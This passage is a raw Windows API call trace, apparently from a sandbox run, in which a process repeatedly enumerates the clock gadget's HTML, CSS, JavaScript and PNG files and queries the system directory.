ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2814, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.html", cAlternateFileName="")) returned 0 [0131.694] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0131.694] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0131.694] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0131.694] CoTaskMemFree (pv=0x4e1c10) [0131.695] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22aaa7b4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.695] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="clock.css", cAlternateFileName="")) returned 1 [0131.696] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x55e, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.css", cAlternateFileName="")) returned 1 [0131.696] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0131.696] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0131.706] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22aaa7b4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.706] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="clock.css", cAlternateFileName="")) returned 1 [0131.706] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x55e, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.css", cAlternateFileName="")) returned 1 [0131.706] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x55e, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.css", cAlternateFileName="")) returned 0 [0131.707] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0131.707] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0131.707] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0131.707] CoTaskMemFree (pv=0x4e1c10) [0131.708] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22aaa7b4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.708] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x467a, dwReserved0=0x0, dwReserved1=0x0, cFileName="clock.js", cAlternateFileName="")) returned 1 [0131.708] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x5c4e, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.js", cAlternateFileName="")) returned 1 [0131.709] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x258c, dwReserved0=0x0, dwReserved1=0x0, cFileName="timeZones.js", cAlternateFileName="")) returned 1 [0131.709] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0131.709] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0131.710] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22aaa7b4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.710] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x467a, dwReserved0=0x0, dwReserved1=0x0, cFileName="clock.js", cAlternateFileName="")) returned 1 [0131.710] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x5c4e, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.js", cAlternateFileName="")) returned 1 [0131.710] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x258c, dwReserved0=0x0, dwReserved1=0x0, cFileName="timeZones.js", cAlternateFileName="")) returned 1 [0131.711] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x258c, dwReserved0=0x0, dwReserved1=0x0, cFileName="timeZones.js", cAlternateFileName="")) returned 0 [0131.711] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0131.711] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0131.711] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0131.711] CoTaskMemFree (pv=0x4e1c10) [0131.732] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x818f91fe, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x818f91fe, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.733] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb44cd7dc, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0xb44cd7dc, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0xb44cd7dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x6530, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer.png", cAlternateFileName="")) returned 1 [0131.733] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8c6d6ed, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8c6d6ed, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb44f393c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x132, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer_dot.png", cAlternateFileName="")) returned 1 [0131.734] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8c2142f, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8c2142f, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb44f393c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x17d, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer_h.png", cAlternateFileName="")) returned 1 [0131.734] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8c4758e, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8c4758e, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4bf19dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer_m.png", cAlternateFileName="")) returned 1 [0131.734] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8c6d6ed, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8c6d6ed, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4e2ce7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xc63, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer_s.png", cAlternateFileName="")) returned 1 [0131.735] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8c9384c, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8c9384c, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4e52fdc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x7454, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer_settings.png", cAlternateFileName="")) returned 1 [0131.735] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8cb99ab, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8cb99ab, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4e52fdc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x77b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="diner.png", cAlternateFileName="")) returned 1 [0131.735] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8cdfb0a, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8cdfb0a, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4e7913c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xb80, dwReserved0=0x0, dwReserved1=0x0, cFileName="diner_dot.png", cAlternateFileName="")) returned 1 [0131.735] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8cb99ab, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8cb99ab, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4e7913c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x170, dwReserved0=0x0, dwReserved1=0x0, cFileName="diner_h.png", cAlternateFileName="")) returned 1 [0131.736] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8cb99ab, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8cb99ab, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4e9f29c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="diner_m.png", cAlternateFileName="")) returned 1 [0131.736] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8cdfb0a, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8cdfb0a, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4ec53fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xb8c, dwReserved0=0x0, dwReserved1=0x0, cFileName="diner_s.png", cAlternateFileName="")) returned 1 [0131.736] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8d05c69, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8d05c69, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4eeb55c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x7fb7, dwReserved0=0x0, dwReserved1=0x0, cFileName="diner_settings.png", cAlternateFileName="")) returned 1 [0131.736] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8d05c69, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8d05c69, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4eeb55c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x876e, dwReserved0=0x0, dwReserved1=0x0, cFileName="flower.png", cAlternateFileName="")) returned 1 [0131.737] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8d51f27, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8d51f27, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4eeb55c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x141, dwReserved0=0x0, dwReserved1=0x0, cFileName="flower_dot.png", cAlternateFileName="")) returned 1 [0131.737] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8d2bdc8, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8d2bdc8, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4f3781c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x184, dwReserved0=0x0, dwReserved1=0x0, cFileName="flower_h.png", cAlternateFileName="")) returned 1 [0131.737] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8d2bdc8, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8d2bdc8, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4f83adc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="flower_m.png", cAlternateFileName="")) returned 1 [0131.737] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8d2bdc8, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8d2bdc8, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4f83adc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xc14, dwReserved0=0x0, dwReserved1=0x0, cFileName="flower_s.png", cAlternateFileName="")) returned 1 [0131.738] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8d51f27, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8d51f27, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4f83adc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x827b, dwReserved0=0x0, dwReserved1=0x0, cFileName="flower_settings.png", cAlternateFileName="")) returned 1 [0131.738] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8d78086, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8d78086, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4f83adc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3cfe, dwReserved0=0x0, dwReserved1=0x0, cFileName="modern.png", cAlternateFileName="")) returned 1 [0131.738] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8dc4344, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8dc4344, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4fa9c3c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xb96, dwReserved0=0x0, dwReserved1=0x0, cFileName="modern_dot.png", cAlternateFileName="")) returned 1 [0131.739] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8d78086, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8d78086, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4fa9c3c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xb6a, dwReserved0=0x0, dwReserved1=0x0, cFileName="modern_h.png", cAlternateFileName="")) returned 1 [0131.739] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8d9e1e5, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8d9e1e5, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4fa9c3c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xb7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="modern_m.png", cAlternateFileName="")) returned 1 [0131.739] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8d9e1e5, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8d9e1e5, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4fa9c3c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xbde, dwReserved0=0x0, dwReserved1=0x0, cFileName="modern_s.png", cAlternateFileName="")) returned 1 [0131.739] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8dea4a3, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8dea4a3, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4fcfd9c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x51d1, dwReserved0=0x0, dwReserved1=0x0, cFileName="modern_settings.png", cAlternateFileName="")) returned 1 [0131.740] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8e10602, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8e10602, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4fcfd9c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x6408, dwReserved0=0x0, dwReserved1=0x0, cFileName="novelty.png", cAlternateFileName="")) returned 1 [0131.740] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8e5c8c0, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8e5c8c0, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4fcfd9c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, 